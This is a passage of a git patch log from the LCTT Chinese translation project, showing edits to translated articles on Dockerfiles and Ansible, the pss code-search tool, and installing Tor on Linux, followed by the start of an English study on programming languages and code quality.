环境中关于最佳实践时可能存在的问题。这里有一个警告:这将是非常具体且技术性的。出现最多的三个问题有: - -### 1\. 在 Dockerfiles 中内嵌的 Shell 脚本。 - -当写 Dockerfiles 时,你可以通过 **/bin/sh -c** 解释指定的脚本。它可以做类似这样的事情: +当写 Dockerfile 时,你可以指定会由 `/bin/sh -c` 解释执行的脚本。它类似如下: ``` RUN dnf install -y nginx ``` -RUN 处是一个 Dockerfile 指令并且其它的都是参数(它传递给 shell)。但是,想像一个更复杂的场景: +这里 `RUN` 是一个 Dockerfile 指令,其它的都是参数(它们传递给 shell)。但是,想像一个更复杂的场景: ``` RUN set -eux; \ @@ -51,29 +42,25 @@ RUN set -eux; \     echo "${goRelSha256} *go.tgz" | sha256sum -c -; \ ``` -这仅是从 [the official golang image][13] 中拿来的一个。它看起来并不好看,是不是? +这仅是从 [golang 官方镜像][13] 中拿来的一段。它看起来并不好看,是不是? -### 2\. 你解析 Dockerfiles 并不容易。 +### 2、 解析 Dockerfile 并不容易 -Dockerfiles 是一个没有正式规范的新格式。如果你需要在你的基础设施(比如,让构建过程自动化一点)中去处理 Dockerfiles 将会很复杂。仅有的规划是 [这个代码][14],它是 **dockerd** 的一部分。问题是你不能使用它作为一个库(library)。最容易的解决方案是你自己写一个解析器,然后祈祷它运行的很好。使用一些众所周知的标记语言不是更好吗?比如,YAML 或者 JSON。 +Dockerfile 是一个没有正式规范的新格式。如果你需要在你的基础设施(比如,让构建过程自动化一点)中去处理 Dockerfile 将会很复杂。仅有的规范是 [这个代码][14],它是 **dockerd** 的一部分。问题是你不能使用它作为一个library来使用。最容易的解决方案是你自己写一个解析器,然后祈祷它运行的很好。使用一些众所周知的标记语言不是更好吗?比如,YAML 或者 JSON。 -### 3\. 管理困难。 +### 3、 管理困难 -如果你熟悉容器镜像的内部结构,你可能知道每个镜像是由层(layers)构成的。一旦容器被创建,这些层就使用联合文件系统技术堆叠在一起(像煎饼一样)。问题是,你并不能显式地管理这些层 — 你不能说,“这儿开始一个新层”,你被迫使用一种可读性不好的方法去改变你的 Dockerfile。最大的问题是,必须遵循一套最佳实践以去达到最优结果 — 新来的人在这个地方可能很困难。 - -### Ansible 语言和 Dockerfiles 比较 - -相比 Ansible,Dockerfiles 的最大缺点,也是 Ansible 的优点,作为一个语言,Ansible 更强大。例如,Dockerfiles 没有直接的变量概念,而 Ansible 有一个完整的模板系统(变量只是它其中的一个特性)。Ansible 包含了很多更易于使用的模块,比如,[**wait_for**][15],它可以被用于服务就绪检查,比如,在处理之前等待服务准备就绪。在 Dockerfiles 中,做任何事情都通过一个 shell 脚本。因此,如果你想去找出已准备好的服务,它必须使用 shell(或者独立安装)去做。使用 shell 脚本的其它问题是,它会变得很复杂,维护成为一种负担。很多人已经找到了这个问题,并将这些 shell 脚本转到 Ansible。 - -如果你对这个主题感兴趣,并且想去了解更多内容,请访问 [Open Source Summit][16],在 Prague 去看 [我的演讲][17],时间是 10 月 23 日,星期一,4:20 p.m. 在 Palmovka room 中。 - - _看更多的 Tomas Tomecek 演讲,[从 Dockerfiles 到 Ansible Container][7],在 [Open Source Summit EU][8],它将在 10 月 23-26 日在 Prague 召开。_ +如果你熟悉容器镜像的内部结构,你可能知道每个镜像是由layer构成的。一旦容器被创建,这些层就使用联合文件系统技术堆叠在一起(像煎饼一样)。问题是,你并不能显式地管理这些层 — 你不能说,“这儿开始一个新层”,你被迫使用一种可读性不好的方法去改变你的 Dockerfile。最大的问题是,必须遵循一套最佳实践以去达到最优结果 — 新来的人在这个地方可能很困难。 +### Ansible 语言和 Dockerfile 比较 +相比 Ansible,Dockerfile 的最大缺点,也是 Ansible 的优点,作为一个语言,Ansible 更强大。例如,Dockerfile 没有直接的变量概念,而 Ansible 有一个完整的模板系统(变量只是它其中的一个特性)。Ansible 包含了很多更易于使用的模块,比如,[wait_for][15],它可以被用于服务就绪检查,比如,在处理之前等待服务准备就绪。在 Dockerfile 中,做任何事情都通过一个 shell 脚本。因此,如果你想去找出已准备好的服务,它必须使用 shell(或者独立安装)去做。使用 shell 脚本的其它问题是,它会变得很复杂,维护成为一种负担。很多人已经发现了这个问题,并将这些 shell 脚本转到 Ansible。 ### 关于作者 - [![human](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/ja.jpeg?itok=4ATUEAbd)][18] Tomas Tomecek - 工程师、Hacker、演讲者、Tinker、Red Hatter。喜欢容器、linux、开源软件、python 3、rust、zsh、tmux。[More about me][9] + [![human](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/ja.jpeg?itok=4ATUEAbd)][18] + +Tomas Tomecek - 工程师、Hacker、演讲者、Tinker、Red Hatter。喜欢容器、linux、开源软件、python 3、rust、zsh、tmux。[More about me][9] -------------------------------------------------------------------------------- @@ -81,7 +68,7 @@ via: https://opensource.com/article/17/10/dockerfiles-ansible-container 作者:[Tomas Tomecek][a] 译者:[qhwdw](https://github.com/qhwdw) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From f4c9c2db746e2d35f096b4c5c38c91d5e40120a6 Mon Sep 17 00:00:00 2001 From: wxy Date: Thu, 28 Dec 2017 18:17:57 +0800 Subject: [PATCH 0845/1627] PUB:20171005 How to manage Linux containers with Ansible Container.md @qhwdw --- ...71005 How to manage Linux containers with Ansible Container.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {translated/tech => published}/20171005 How to manage Linux containers with Ansible Container.md (100%) diff --git a/translated/tech/20171005 How to manage Linux containers with Ansible Container.md b/published/20171005 How to manage Linux containers with Ansible Container.md similarity index 100% rename from translated/tech/20171005 How to manage Linux containers with Ansible Container.md rename to published/20171005 How to manage Linux containers with Ansible Container.md From e1acc68967a40badc71df3c0d56099b97828202c Mon Sep 17 00:00:00 2001 From: wxy Date: Thu, 28 Dec 2017 21:36:12 +0800 Subject: [PATCH 0846/1627] PRF&PUB:20171222 Improve your code searching skills with pss.md @lujun9972 --- ...ove your code searching skills with pss.md | 95 +++++++++++++++++++ ...ove your code searching skills with pss.md | 83 ---------------- 2 files changed, 95 insertions(+), 83 deletions(-) create mode 100644 published/20171222 Improve your code searching skills with pss.md delete mode 100644 translated/tech/20171222 Improve your code searching skills with pss.md diff --git a/published/20171222 Improve your code searching skills with pss.md b/published/20171222 Improve your code searching skills with pss.md new file mode 100644 index 0000000000..256fa0597e --- /dev/null +++ b/published/20171222 Improve your code searching skills with pss.md @@ -0,0 +1,95 @@ +使用 pss 提升你的代码搜索能力 +====== + +![](https://fedoramagazine.org/wp-content/uploads/2017/12/pss-945x400.jpg) + +搜索代码库是开发者每天都要做的事情。从修改 bug 到学习新代码,或者查看如何调用某个 API,能快速在代码库中导航的能力都是一大助力。幸运的是,我们有专门的工具来搜索代码。[pss][1] 就是其中一个工具,让我们来看看如何安装和使用它吧。 + +### 什么是 pss? + +`pss` 是一个帮你在源代码文件中进行搜索的命令行工具。`pss` 递归地在目录树中进行搜索,它能自动根据文件名和后缀判断哪些文件需要搜索,哪些文件不需搜索,并且会自动跳过那些你不会想搜索的目录(比如 `.svn` 和 `.git`),还能用色彩渲染输出以方便人们阅读,以及其他很多功能。 + +### 安装 pss + +使用下面命令在 Fedora 上安装 `pss`: + +``` + $ dnf install pss +``` + +安装好后就能在终端调用 `pss` 了: + +``` + $ pss +``` + +不带参数调用 `pss` 或者带上 `-h` 标志会输出详细的使用说明。 + +### 使用案例 + +现在你安装好 `pss` 了,下面来看一些例子吧。 + +``` + $ pss foo +``` + +该命令只是简单的搜索 `foo`。你也可以限制 `pss` 让它只在 python 文件中搜索 `foo`: + +``` + $ pss foo --py +``` + +还能在非 python 文件中搜索 `bar`: + +``` + $ pss bar --nopy +``` + +而且,`pss` 支持大多数常见的源代码文件类型,要获取完整的支持列表,执行: + +``` +$ pss --help-types +``` + +你还能指定忽略某些目录不进行搜索。默认情况下,`pss` 会忽略类似 `.git`,`__pycache__`,`.metadata` 等目录。 + +``` +$ pss foo --py --ignore-dir=dist +``` + +此外,`pss` 还能显示搜索结果的上下文。 + +``` +$ pss -A 5 foo +``` + +会显示匹配结果的后面 5 行内容。 + +``` +$ pss -B 5 foo +``` + +会显示匹配结果的前面 5 行内容。 + +``` +$ pss -C 5 foo +``` + +会显示匹配结果的前后各 5 行内容。 + +如果你想知道如何使用 `pss ` 进行正则表达式搜索以及它的其他选项的话,可以在[这里][2]看到更多的例子。 + + +-------------------------------------------------------------------------------- + +via: https://fedoramagazine.org/improve-code-searching-skills-pss/ + +作者:[Clément Verna][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://fedoramagazine.org +[1]:https://github.com/eliben/pss +[2]:https://github.com/eliben/pss/wiki/Usage-samples diff --git a/translated/tech/20171222 Improve your code searching skills with pss.md b/translated/tech/20171222 Improve your code searching skills with pss.md deleted file mode 100644 index 3d4da18d6d..0000000000 --- a/translated/tech/20171222 Improve your code searching skills with pss.md +++ /dev/null @@ -1,83 +0,0 @@ -使用 pss 提升你的代码搜索能力 -====== -![](https://fedoramagazine.org/wp-content/uploads/2017/12/pss-945x400.jpg) -搜索代码库是开发者每天都要做的事情。从修改 bug 到学习新代码,或者查看如何调用某个 api,能快速在代码库中导航的能力都是一大助力。幸运的是,我们有专门的工具来搜索代码。[**pss**][1] 就是其中一个工具,让我们来看看如何安装和使用它吧。 - -### 什么是 pss? - -**pss** 是一个帮你在源代码文件中进行搜索的命令行工具。**pss** 递归地在目录树中进行搜索,它能自动根据文件名和后缀判断哪些文件需要搜索,哪些文件不需搜索,并且会自动跳过那些你不会想搜索的目录(比如 `.svn` 和 `.git`),还能用色彩渲染输出以方便人们阅读,以及其他很多功能。 - -### 安装 pss - -使用下面命令在 Fedora 上安装 **pss**: -``` - $ dnf install pss -``` - -安装好后就能在终端调用 **pss** 了 -``` - $ pss -``` - -不带参数调用 **pss** 或者带上 `-h` 标志会输出详细的使用说明。 - -### 使用案例 - -现在你安装好 **pss** 了,下面来看一些例子吧。 -``` - $ pss foo -``` - -该命令只是简单的搜索 `foo`。你也可以限制 pss 让它只在 python 文件中搜索 `foo`: -``` - $ pss foo --py -``` - -还能在非 python 文件中搜索 `bar`: -``` - $ pss bar --nopy -``` - -而且,**pss** 支持大多数常见的源代码文件类型,要获取完整的支持列表,执行: -``` -$ pss --help-types -``` - -你还能指定忽略某些目录不进行搜索。默认情况下,**pss** 会忽略类似 `.git`,`__pycache__`,`.metadata` 等目录。 -``` -$ pss foo --py --ignore-dir=dist -``` - -此外,**pss** 还能显示搜索结果的上下文: -``` -$ pss -A 5 foo -``` -会现实匹配结果的后面 5 行内容 - -``` -$ pss -B 5 foo -``` - -会现实匹配结果的前面 5 行内容 -``` -$ pss -C 5 foo -``` - -会现实匹配结果的前后各 5 行内容 - -如果你想知道如何使用 **pss ** 进行正则表达式搜索以及它的其他选项的话,可以在[这里 ][2] 看到更多的例子。 - - --------------------------------------------------------------------------------- - -via: https://fedoramagazine.org/improve-code-searching-skills-pss/ - -作者:[Author Archive;Author Website;Clément Verna][a] -译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://fedoramagazine.org -[1]:https://github.com/eliben/pss -[2]:https://github.com/eliben/pss/wiki/Usage-samples From 45fb2866bd0a4e95723fe5f824ce62859a674112 Mon Sep 17 00:00:00 2001 From: geekpi Date: Fri, 29 Dec 2017 08:56:28 +0800 Subject: [PATCH 0847/1627] translated --- ...- Learn to install TOR network on Linux.md | 104 ------------------ ...- Learn to install TOR network on Linux.md | 101 +++++++++++++++++ 2 files changed, 101 insertions(+), 104 deletions(-) delete mode 100644 sources/tech/20171219 Surf anonymously- Learn to install TOR network on Linux.md create mode 100644 translated/tech/20171219 Surf anonymously- Learn to install TOR network on Linux.md diff --git a/sources/tech/20171219 Surf anonymously- Learn to install TOR network on Linux.md b/sources/tech/20171219 Surf anonymously- Learn to install TOR network on Linux.md deleted file mode 100644 index a47f00ef75..0000000000 --- a/sources/tech/20171219 Surf anonymously- Learn to install TOR network on Linux.md +++ /dev/null @@ -1,104 +0,0 @@ -translating---geekpi - -Surf anonymously: Learn to install TOR network on Linux -====== -Tor Network is an anonymous network to secure your internet & privacy. Tor network is a group of volunteer operated servers. Tor protects internet communication by bouncing it around a distributed network of relay system run by volunteers. This prevents us from people snooping the internet, they can't learn what site we visit or where is the user physically & it also allows us to use blocked websites. - -In this tutorial, we will learn to install Tor network on various Linux operating systems & how we can use it configure our applications to secure the communications. - - **(Recommended Read:[How to install Tor Browser on Linux (Ubuntu, Mint, RHEL, Fedora, CentOS)][1])** - -### CentOS/RHEL/Fedora - -Tor packages are part of EPEL repositories, so we can simply install Tor using yum if we have EPEL repositories installed. If you need to install EPEL repos on your system, use the suitable command (based on OS & Architecture) from the following , - - **RHEL/CentOS 7** - - **$ sudo rpm -Uvh https://dl.fedoraproject.org/pub/epel/7/x86_64/e/epel-release-7-11.noarch.rpm** - - **RHEL/CentOS 6 (64 Bit)** - - **$ sudo rpm -Uvh http://download.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm** - - **RHEL/CentOS 6 (32 Bit)** - - **$ sudo rpm -Uvh http://dl.fedoraproject.org/pub/epel/6/i386/epel-release-6-8.noarch.rpm** - -Once installed, we can than install Tor browser with the following command, - - **$ sudo yum install tor** - -### Ubuntu - -For installing Tor network on Ubuntu machines, we need to add Official Tor repositories. We need to add the repo information to '/etc/apt/sources.list' - - **$ sudo nano /etc/apt/sources.list** - -Now add the repo information mentioned below based on your OS, - - **Ubuntu 16.04** - - **deb http://deb.torproject.org/torproject.org xenial main** -**deb-src http://deb.torproject.org/torproject.org xenial main** - - **Ubuntu 14.04** - - **deb http://deb.torproject.org/torproject.org trusty main** -**deb-src http://deb.torproject.org/torproject.org trusty main** - -Next open the terminal & execute the following two commands to add the gpg keys used to sign the packages, - - **$ gpg -keyserver keys.gnupg.net -recv A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89** -**$ gpg -export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -** - -Now run update & install the Tor network, - - **$ sudo apt-get update** -**$ sudo apt-get install tor deb.torproject.org-keyring** - -### Debian - -We can install Tor network on Debian without having to add any repositories. Just open the terminal & execute the following command as root, - - **$ apt install tor** - -### - -### Tor Configuration - -If your end game is only to secure the internet browsing & not anything else, than its better you use Tor Browser but if you need to secure your apps like Instant Messaging, IRC, Jabber etc than we need to configure those apps for secure communication. But Before we do that, let's check out some [**warning mentioned on Tor Website**][2] - -- No torrents over Tor -- Don't use any browser plugins with Tor -- Use only HTTPS version of the websites -- Don't open any document downloaded through Tor while online. -- Use Tor bridges when you can - -Now to configure any app to use Tor, for example jabber; firstly select the 'SOCKS proxy' rather than using the HTTP proxy & use port number 9050 or you can also use port 9150 (used by Tor browser). - -![install tor network][4] - -You can also configure Firefox browser to be used on Tor network. Open Firefox browser & goto 'Network Proxy ' settings in 'Preferences' under 'General' tab & make the proxy entry as follows, - -![install tor network][6] - -We can now access Firefox on Tor network with complete anonymity. - -This was our tutorial on how we can install Tor network & use ti to surf the internet anonymously. Do mention you queries & suggestions in the comment box below. - - --------------------------------------------------------------------------------- - -via: http://linuxtechlab.com/learn-install-tor-network-linux/ - -作者:[Shusain][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:http://linuxtechlab.com/author/shsuain/ -[1]:http://linuxtechlab.com/install-tor-browser-linux-ubuntu-centos/ -[2]:https://www.torproject.org/download/download.html.en#warning -[4]:https://i0.wp.com/linuxtechlab.com/wp-content/uploads/2017/12/tor-1-compressor.png?resize=333%2C240 -[6]:https://i1.wp.com/linuxtechlab.com/wp-content/uploads/2017/12/tor-2-compressor.png?resize=730%2C640 diff --git a/translated/tech/20171219 Surf anonymously- Learn to install TOR network on Linux.md b/translated/tech/20171219 Surf anonymously- Learn to install TOR network on Linux.md new file mode 100644 index 0000000000..97dc71c641 --- /dev/null +++ b/translated/tech/20171219 Surf anonymously- Learn to install TOR network on Linux.md @@ -0,0 +1,101 @@ +匿名上网:学习在 Linux 上安装 TOR 网络 +====== +Tor 网络是一个匿名网络来保护你的互联网以及隐私。Tor 网络是一组志愿者运营的服务器。Tor 通过在由志愿者运营的分布式中继系统之间跳转来保护互联网通信。这避免了人们窥探我们的网络,他们无法了解我们访问的网站或者用户身在何处,并且也可以让我们访问被屏蔽的网站。 + +在本教程中,我们将学习在各种 Linux 操作系统上安装 Tor 网络,以及如何使用它来配置我们的程序来保护通信。 + + **(推荐阅读:[如何在 Linux 上安装 Tor 浏览器(Ubuntu、Mint、RHEL、Fedora、CentOS)][1])** + +### CentOS/RHEL/Fedora + +Tor 包是 EPEL 仓库的一部分,所以如果我们安装了 EPEL 仓库,我们可以直接使用 yum 来安装 Tor。如果你需要在您的系统上安装 EPEL 仓库,请使用下列适当的命令(基于操作系统和体系结构): + + **RHEL/CentOS 7** + + **$ sudo rpm -Uvh https://dl.fedoraproject.org/pub/epel/7/x86_64/e/epel-release-7-11.noarch.rpm** + + **RHEL/CentOS 6 (64 位)** + + **$ sudo rpm -Uvh http://download.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm** + + **RHEL/CentOS 6 (32 位)** + + **$ sudo rpm -Uvh http://dl.fedoraproject.org/pub/epel/6/i386/epel-release-6-8.noarch.rpm** + +安装完成后,我们可以用下面的命令安装 Tor 浏览器: + + **$ sudo yum install tor** + +### Ubuntu + +为了在 Ubuntu 机器上安装 Tor 网络,我们需要添加官方 Tor 仓库。我们需要将仓库信息添加到 “/etc/apt/sources.list” 中。 + + **$ sudo nano /etc/apt/sources.list** + +现在根据你的操作系统添加下面的仓库信息: + + **Ubuntu 16.04** + + **deb http://deb.torproject.org/torproject.org xenial main** +**deb-src http://deb.torproject.org/torproject.org xenial main** + + **Ubuntu 14.04** + + **deb http://deb.torproject.org/torproject.org trusty main** +**deb-src http://deb.torproject.org/torproject.org trusty main** + +接下来打开终端并执行以下两个命令添加用于签名软件包的 gpg 密钥: + + **$ gpg -keyserver keys.gnupg.net -recv A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89** +**$ gpg -export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -** + +现在运行更新并安装 Tor 网络: + + **$ sudo apt-get update** +**$ sudo apt-get install tor deb.torproject.org-keyring** + +### Debian + +我们可以无需添加任何仓库在 Debian 上安装 Tor 网络。只要打开终端并以 root 身份执行以下命令: + + **$ apt install tor** + +### + +### Tor 配置 + +如果你最终目的只是为了保护互联网浏览,而没有其他要求,直接使用 Tor 更好,但是如果你需要保护即时通信、IRC、Jabber 等程序,则需要配置这些应用程序进行安全通信。但在做之前,让我们先看看**[Tor 网站上提到的警告][2]**。 + +- 不要大流量使用 Tor +- 不要在 Tor 中使用任何浏览器插件 +- 只使用 HTTPS 版本的网站 +- 不要在线打开通过 Tor 下载的任何文档。 +- 尽可能使用 Tor 桥 + +现在配置程序来使用 Tor,例如 jabber。首先选择 “SOCKS代理” 而不是使用 HTTP 代理,并使用端口号 9050,或者也可以使用端口 9150(Tor 浏览器使用)。 + +![install tor network][4] + +你也可以配置 Firefox 浏览器使用 Tor 网络。打开 Firefox 浏览器,在“常规”选项卡的“首选项”中进入“网络代理”设置,并按以下步骤输入代理: + +![install tor network][6] + +现在你可以在 Firefox 中使用 Tor 网络完全匿名访问了。 + +这就是我们如何安装 Tor 网络并使用 Tor 浏览互联网的教程。请在下面的评论栏中提出你的问题和建议。 + +-------------------------------------------------------------------------------- + +via: http://linuxtechlab.com/learn-install-tor-network-linux/ + +作者:[Shusain][a] +译者:[geekpi](https://github.com/geekpi) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://linuxtechlab.com/author/shsuain/ +[1]:http://linuxtechlab.com/install-tor-browser-linux-ubuntu-centos/ +[2]:https://www.torproject.org/download/download.html.en#warning +[4]:https://i0.wp.com/linuxtechlab.com/wp-content/uploads/2017/12/tor-1-compressor.png?resize=333%2C240 +[6]:https://i1.wp.com/linuxtechlab.com/wp-content/uploads/2017/12/tor-2-compressor.png?resize=730%2C640 From a6804a683ab5bcc2a5ac5b266c56a8ffad744225 Mon Sep 17 00:00:00 2001 From: geekpi Date: Fri, 29 Dec 2017 08:58:15 +0800 Subject: [PATCH 0848/1627] translating --- .../20171123 Check Cryptocurrency Prices From Commandline.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171123 Check Cryptocurrency Prices From Commandline.md b/sources/tech/20171123 Check Cryptocurrency Prices From Commandline.md index a6faf7a2c1..4a7e85ce0c 100644 --- a/sources/tech/20171123 Check Cryptocurrency Prices From Commandline.md +++ b/sources/tech/20171123 Check Cryptocurrency Prices From Commandline.md @@ -1,3 +1,5 @@ +translating---geekpi + Check Cryptocurrency Prices From Commandline ====== ![配图](https://www.ostechnix.com/wp-content/uploads/2017/11/bitcoin-1-720x340.jpg) From de59bee561484a798d4e0bae760c134e42cbeee6 Mon Sep 17 00:00:00 2001 From: qhwdw Date: Fri, 29 Dec 2017 10:59:13 +0800 Subject: [PATCH 0849/1627] Translated by qhwdw --- ...ng Languages and Code Quality in GitHub.md | 415 ------------------ ...ng Languages and Code Quality in GitHub.md | 414 +++++++++++++++++ 2 files changed, 414 insertions(+), 415 deletions(-) delete mode 100644 sources/tech/20171007 A Large-Scale Study of Programming Languages and Code Quality in GitHub.md create mode 100644 translated/tech/20171007 A Large-Scale Study of Programming Languages and Code Quality in GitHub.md diff --git a/sources/tech/20171007 A Large-Scale Study of Programming Languages and Code Quality in GitHub.md b/sources/tech/20171007 A Large-Scale Study of Programming Languages and Code Quality in GitHub.md deleted file mode 100644 index f683d77c43..0000000000 --- a/sources/tech/20171007 A Large-Scale Study of Programming Languages and Code Quality in GitHub.md +++ /dev/null @@ -1,415 +0,0 @@ -Translating by qhwdw -A Large-Scale Study of Programming Languages and Code Quality in GitHub -============================================================ - - -![A Large-Scale Study of Programming Languages, illustration](https://cacm.acm.org/system/assets/0002/8759/092117_Getty_Large-Scale-Study1.large.jpg?1506007488&1506007487 "A Large-Scale Study of Programming Languages, illustration") - -What is the effect of programming languages on software quality? This question has been a topic of much debate for a very long time. In this study, we gather a very large data set from GitHub (728 projects, 63 million SLOC, 29,000 authors, 1.5 million commits, in 17 languages) in an attempt to shed some empirical light on this question. This reasonably large sample size allows us to use a mixed-methods approach, combining multiple regression modeling with visualization and text analytics, to study the effect of language features such as static versus dynamic typing and allowing versus disallowing type confusion on software quality. By triangulating findings from different methods, and controlling for confounding effects such as team size, project size, and project history, we report that language design does have a significant, but modest effect on software quality. Most notably, it does appear that disallowing type confusion is modestly better than allowing it, and among functional languages, static typing is also somewhat better than dynamic typing. We also find that functional languages are somewhat better than procedural languages. It is worth noting that these modest effects arising from language design are overwhelmingly dominated by the process factors such as project size, team size, and commit size. However, we caution the reader that even these modest effects might quite possibly be due to other, intangible process factors, for example, the preference of certain personality types for functional, static languages that disallow type confusion. - -[Back to Top][46] - -### 1\. Introduction - -A variety of debates ensue during discussions whether a given programming language is "the right tool for the job." While some of these debates may appear to be tinged with an almost religious fervor, most agree that programming language choice can impact both the coding process and the resulting artifact. - -Advocates of strong, static typing tend to believe that the static approach catches defects early; for them, an ounce of prevention is worth a pound of cure. Dynamic typing advocates argue, however, that conservative static type checking is wasteful of developer resources, and that it is better to rely on strong dynamic type checking to catch type errors as they arise. These debates, however, have largely been of the armchair variety, supported only by anecdotal evidence. - -This is perhaps not unreasonable; obtaining empirical evidence to support such claims is a challenging task given the number of other factors that influence software engineering outcomes, such as code quality, language properties, and usage domains. Considering, for example, software quality, there are a number of well-known influential factors, such as code size,[6][1] team size,[2][2]and age/maturity.[9][3] - -Controlled experiments are one approach to examining the impact of language choice in the face of such daunting confounds, however, owing to cost, such studies typically introduce a confound of their own, that is, limited scope. The tasks completed in such studies are necessarily limited and do not emulate  _real world_  development. There have been several such studies recently that use students, or compare languages with static or dynamic typing through an experimental factor.[7][4], [12][5],[15][6] - -Fortunately, we can now study these questions over a large body of real-world software projects. GitHub contains many projects in multiple languages that substantially vary across size, age, and number of developers. Each project repository provides a detailed record, including contribution history, project size, authorship, and defect repair. We then use a variety of tools to study the effects of language features on defect occurrence. Our approach is best described as mixed-methods, or triangulation[5][7] approach; we use text analysis, clustering, and visualization to confirm and support the findings of a quantitative regression study. This empirical approach helps us to understand the practical impact of programming languages, as they are used colloquially by developers, on software quality. - -[Back to Top][47] - -### 2\. Methodology - -Our methods are typical of large scale observational studies in software engineering. We first gather our data from several sources using largely automated methods. We then filter and clean the data in preparation for building a statistical model. We further validate the model using qualitative methods. Filtering choices are driven by a combination of factors including the nature of our research questions, the quality of the data and beliefs about which data is most suitable for statistical study. In particular, GitHub contains many projects written in a large number of programming languages. For this study, we focused our data collection efforts on the most popular projects written in the most popular languages. We choose statistical methods appropriate for evaluating the impact of factors on count data. - -![*](http://dl.acm.org/images/bullet.gif) - **2.1\. Data collection** - -We choose the top 19 programming languages from GitHub. We disregard CSS, Shell script, and Vim script as they are not considered to be general purpose languages. We further include `Typescript`, a typed superset of `JavaScript`. Then, for each of the studied languages we retrieve the top 50 projects that are primarily written in that language. In total, we analyze 850 projects spanning 17 different languages. - -Our language and project data was extracted from the  _GitHub Archive_ , a database that records all public GitHub activities. The archive logs 18 different GitHub events including new commits, fork events, pull request, developers' information, and issue tracking of all the open source GitHub projects on an hourly basis. The archive data is uploaded to Google BigQuery to provide an interface for interactive data analysis. - -**Identifying top languages.** We aggregate projects based on their primary language. Then we select the languages with the most projects for further analysis, as shown in [Table 1][48]. A given project can use many languages; assigning a single language to it is difficult. Github Archive stores information gathered from GitHub Linguist which measures the language distribution of a project repository using the source file extensions. The language with the maximum number of source files is assigned as the  _primary language_  of the project. - - [![t1.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/t1.jpg)][49] -**Table 1\. Top 3 projects in each language.** - -**Retrieving popular projects.** For each selected language, we filter the project repositories written primarily in that language by its popularity based on the associated number of  _stars._ This number indicates how many people have actively expressed interest in the project, and is a reasonable proxy for its popularity. Thus, the top 3 projects in C are  _linux, git_ , and  _php-src_ ; and for C++ they are  _node-webkit, phantomjs_ , and  _mongo_ ; and for `Java` they are  _storm, elasticsearch_ , and  _ActionBarSherlock._  In total, we select the top 50 projects in each language. - -To ensure that these projects have a sufficient development history, we drop the projects with fewer than 28 commits (28 is the first quartile commit count of considered projects). This leaves us with 728 projects. [Table 1][50] shows the top 3 projects in each language. - -**Retrieving project evolution history.** For each of 728 projects, we downloaded the non-merged commits, commit logs, author date, and author name using  _git._  We compute code churn and the number of files modified per commit from the number of added and deleted lines per file. We retrieve the languages associated with each commit from the extensions of the modified files (a commit can have multiple language tags). For each commit, we calculate its  _commit age_  by subtracting its commit date from the first commit of the corresponding project. We also calculate other project-related statistics, including maximum commit age of a project and the total number of developers, used as control variables in our regression model, and discussed in Section 3\. We identify bug fix commits made to individual projects by searching for error related keywords: "error," "bug," "fix," "issue," "mistake," "incorrect," "fault," "defect," and "flaw," in the commit log, similar to a prior study.[18][8] - -[Table 2][51] summarizes our data set. Since a project may use multiple languages, the second column of the table shows the total number of projects that use a certain language at some capacity. We further exclude some languages from a project that have fewer than 20 commits in that language, where 20 is the first quartile value of the total number of commits per project per language. For example, we find 220 projects that use more than 20 commits in C. This ensures sufficient activity for each language–project pair. - - [![t2.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/t2.jpg)][52] -**Table 2\. Study subjects.** - -In summary, we study 728 projects developed in 17 languages with 18 years of history. This includes 29,000 different developers, 1.57 million commits, and 564,625 bug fix commits. - -![*](http://dl.acm.org/images/bullet.gif) - **2.2\. Categorizing languages** - -We define language classes based on several properties of the language thought to influence language quality,[7][9], [8][10], [12][11] as shown in [Table 3][53]. The  _Programming Paradigm_  indicates whether the project is written in an imperative procedural, imperative scripting, or functional language. In the rest of the paper, we use the terms procedural and scripting to indicate imperative procedural and imperative scripting respectively. - - [![t3.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/t3.jpg)][54] -**Table 3\. Different types of language classes.** - - _Type Checking_  indicates static or dynamic typing. In statically typed languages, type checking occurs at compile time, and variable names are bound to a value and to a type. In addition, expressions (including variables) are classified by types that correspond to the values they might take on at run-time. In dynamically typed languages, type checking occurs at run-time. Hence, in the latter, it is possible to bind a variable name to objects of different types in the same program. - - _Implicit Type Conversion_  allows access of an operand of type T1 as a different type T2, without an explicit conversion. Such implicit conversion may introduce type-confusion in some cases, especially when it presents an operand of specific type T1, as an instance of a different type T2\. Since not all implicit type conversions are immediately a problem, we operationalize our definition by showing examples of the implicit type confusion that can happen in all the languages we identified as allowing it. For example, in languages like `Perl, JavaScript`, and `CoffeeScript` adding a string to a number is permissible (e.g., "5" + 2 yields "52"). The same operation yields 7 in `Php`. Such an operation is not permitted in languages such as `Java` and `Python` as they do not allow implicit conversion. In C and C++ coercion of data types can result in unintended results, for example, `int x; float y; y=3.5; x=y`; is legal C code, and results in different values for x and y, which, depending on intent, may be a problem downstream.[a][12] In `Objective-C` the data type  